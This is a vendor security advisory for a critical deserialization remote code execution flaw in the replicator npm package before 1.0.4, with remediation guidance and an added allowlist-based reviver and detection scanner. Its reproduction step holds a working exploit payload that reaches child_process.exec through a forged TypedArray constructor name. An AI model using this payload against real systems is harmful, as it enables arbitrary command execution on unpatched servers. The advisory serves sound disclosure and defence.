Deserialization RCE Attack In Replicator - CX-2021-4787

Severity

Severity: 9.8 - Critical Severity

Advisory Timeline Summary
Affected versions of the replicator npm package are vulnerable to a deserialization RCE via TypedArray objects. replicator does not verify the constructor name given when deserializing a TypedArray, which lets an attacker create arbitrary objects.

Product

replicator before 1.0.4.

Impact

If untrusted data is deserialized, an attacker could achieve RCE.

Steps To Reproduce

replicator.decode('[{"@t":"[[TypedArray]]","data":{"ctorName":"setTimeout","arr":{"@t":"[[TypedArray]]","data":{"ctorName":"Function","arr":"process.mainModule.require(\'child_process\').exec(\'calc\');"}}}}]')

Expected Result:

The command passed to the exec function will be run; in this case, aimed at a Windows machine, a calculator will pop up.
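The type check the advisory describes as missing, as an added example in JavaScript (not replicator's own code): a reviver that resolves `ctorName` only against an allowlist of real TypedArray constructors, plus a scanner that flags `[[TypedArray]]` records with any other constructor name. It assumes only the record shape shown in the reproduction step above.

```javascript
// Added example, not replicator's code. The vulnerable pattern resolves
// `ctorName` against the global object; the hardened reviver below uses an
// explicit allowlist so names like "Function" or "setTimeout" can never resolve.

const TYPED_ARRAY_CTORS = new Map(
  [Int8Array, Uint8Array, Uint8ClampedArray, Int16Array, Uint16Array,
   Int32Array, Uint32Array, Float32Array, Float64Array,
   BigInt64Array, BigUint64Array].map((c) => [c.name, c])
);

// Hardened reviver for one {"ctorName", "arr"} record: allowlisted constructor,
// and `arr` must be a plain array of the element type that constructor holds.
function reviveTypedArray(data) {
  if (!data || typeof data !== 'object') throw new TypeError('bad TypedArray record');
  const Ctor = TYPED_ARRAY_CTORS.get(data.ctorName);
  if (!Ctor) throw new TypeError(`refusing non-TypedArray ctor: ${data.ctorName}`);
  const elemType = (Ctor === BigInt64Array || Ctor === BigUint64Array) ? 'bigint' : 'number';
  if (!Array.isArray(data.arr) || !data.arr.every((v) => typeof v === elemType)) {
    throw new TypeError(`arr must be an array of ${elemType}`);
  }
  return Ctor.from(data.arr);
}

// Detection helper for inbound payloads: walk parsed JSON and report every
// "[[TypedArray]]" record whose ctorName is not an allowed constructor.
function findSuspiciousTypedArrays(node, path = '$', out = []) {
  if (Array.isArray(node)) {
    node.forEach((v, i) => findSuspiciousTypedArrays(v, `${path}[${i}]`, out));
  } else if (node && typeof node === 'object') {
    const ctorName = node.data && node.data.ctorName;
    if (node['@t'] === '[[TypedArray]]' && !TYPED_ARRAY_CTORS.has(ctorName)) {
      out.push({ path, ctorName });
    }
    for (const [k, v] of Object.entries(node)) {
      findSuspiciousTypedArrays(v, `${path}.${k}`, out);
    }
  }
  return out;
}

// Constructed sample record in the advisory's shape, with a benign constructor.
const benignRecord = { '@t': '[[TypedArray]]', data: { ctorName: 'Uint8Array', arr: [1, 2, 3] } };
```

Running `findSuspiciousTypedArrays(JSON.parse(payload))` over the reproduction payload above reports both nested records, since neither `setTimeout` nor `Function` is in the allowlist.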

Remediation

Update replicator dependency to 1.0.4 or above.

Properties

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

User Interaction: None

Scope: Unchanged

Confidentiality: High

Integrity: High

Availability: High

Credit

This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.

Resources

  1. Pull request
  2. Issue
  3. Commit